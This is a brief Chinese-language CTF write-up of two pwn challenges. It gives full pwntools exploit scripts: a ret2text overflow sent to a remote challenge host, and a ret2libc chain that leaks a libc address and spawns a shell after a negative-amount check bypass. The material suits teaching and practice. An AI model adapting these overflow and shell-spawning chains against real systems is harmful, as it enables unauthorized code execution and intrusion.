由于期末的原因就吃饭的时候看了两眼(?)
做的三道都签到级()
nc姑且就不说了,连上,好像就没什么难点了
easy_pwn
没啥好说的,混淆了一次HECTF,打ret2text
from pwn import *

# ret2text against the easy_pwn service: overwrite the saved return address
# and return into the code the original script calls `sh` (0x4011d6).
# The fixed 0x40xxxx addresses only hold for a non-PIE binary.
io = remote("8.153.93.57",30214)
#io = process("./pwn")
#gdb.attach(io)

# First prompt; the service apparently expects this token before the overflow.
io.sendline(b'GDBSE')

win_addr = 0x4011D6       # presumably the shell-spawning path (named `sh` originally) — verify in the binary
ret_gadget = 0x40101a     # lone `ret`; keeps rsp 16-byte aligned before entering win_addr

# 0x30 bytes up to the saved rbp, plus 8 for rbp itself (offsets from the original script).
filler = b'a' * (0x30 + 8)
rop_chain = p64(ret_gadget) + p64(win_addr)
io.sendline(filler + rop_chain)
io.interactive()
shop
仍然简单：在 admin 面板把 amount 填成 -1 即可绕过数量检查（负数能通过检查，推测是有符号比较），之后就是常规的 ret2libc：先用 puts@plt 泄露 puts@got 算出 libc 基址，再打 system("/bin/sh")。
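from pwn import *

# ret2libc against the "shop" binary (local run).
# Stage 1 leaks puts@GLIBC via puts@plt and returns to the menu;
# stage 2 overflows again and calls system("/bin/sh").
# Run as `python3 exp.py GDB` to attach gdb before the final chain is sent
# (the original script attached unconditionally, which blocks every run).
context.log_level = 'debug'
io = process("./pwn")
elf = ELF("./pwn")
libc = ELF("./libc.so.6")

# Fixed 0x40xxxx addresses: valid only because the binary is non-PIE.
record = 0x401266      # return target after the leak; lands back in the menu so we can overflow again
ret = 0x40101a         # lone `ret` gadget, used for 16-byte stack alignment before system()
pop_rdi = 0x401240     # pop rdi ; ret

# 0x50 bytes up to the saved rbp, plus 8 for rbp itself (offsets from the original script).
PAD = b'a' * (0x50 + 8)

# Admin panel: amount -1 gets past the quantity check (per the writeup; likely a signed compare).
io.sendlineafter(b'choice:', b'2')
io.sendlineafter(b'password:', b'shopadmin123')
io.sendlineafter(b'amount:', b'-1')

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]

# Stage 1: name/description inputs (prompts not shown here), then the
# overflowing description: puts(puts@got) -> back to `record`.
io.sendline(b'okabe')
io.sendline(b'123')
leak_chain = PAD + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(record)
io.sendline(leak_chain)

io.recvuntil(b'description:\n')
leaked = io.recvn(6)   # exactly 6 bytes; recv(6) may return a short read and corrupt the leak
puts = u64(leaked.ljust(8, b'\x00'))
log.success(hex(puts))

# Sanity-check the leak against the libc we plan to use: the low 12 bits of a
# libc symbol are unaffected by ASLR, so a mismatch means wrong libc or offset.
# log.error() raises, so a bad leak stops here instead of sending a garbage chain.
if (puts & 0xfff) != (libc.symbols['puts'] & 0xfff):
    log.error("leaked puts %#x does not match the page offset in libc.so.6", puts)
libc_base = puts - libc.symbols['puts']
log.success(hex(libc_base))

# Stage 2: system("/bin/sh"); the leading `ret` realigns the stack.
system = libc.symbols['system'] + libc_base
sh = libc_base + next(libc.search(b'/bin/sh'))
io.sendline(b'okabe')
io.sendline(b'123')
shell_chain = PAD + p64(ret) + p64(pop_rdi) + p64(sh) + p64(system)
if args.GDB:
    gdb.attach(io)
io.sendline(shell_chain)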
io.interactive()
依稀记得吃完饭的时候还有零解题,如果有打的师傅看到这篇文章,能不能发发剩下的pwn题,忘下载了()
不过忙期末周估计也没啥时间打就是了()
原本想着去年打HE的时候好像没做出什么题今年好好来复仇(bushi),但今年碰上期末周拼尽全力无法战胜了,就这样吧()
这么强?!